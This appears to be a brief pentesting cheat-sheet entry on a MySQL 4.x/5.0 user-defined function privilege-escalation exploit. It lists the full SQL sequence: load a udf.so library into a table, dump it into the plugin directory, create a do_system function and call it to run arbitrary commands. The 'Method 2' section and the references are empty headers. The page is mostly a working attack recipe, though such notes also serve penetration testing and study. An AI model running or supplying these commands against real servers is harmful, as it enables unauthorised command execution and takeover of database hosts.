mysql exploit
MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit
Requirements
.so file download
Method 1 (access to box):
mysql -uroot -p<PASS>
> USE mysql;
> CREATE table kashz(line blob);
> INSERT INTO kashz VALUES(load_file('/PATH/udf.so'));
> SELECT * FROM kashz INTO dumpfile '/PLUGIN-DIR/udf.so';
# create function
> CREATE FUNCTION do_system RETURNS integer soname 'udf.so';
> SELECT * from mysql.func;
# run RCE
> SELECT do_system('RCE');Method 2 (no access no box):
References
Last updated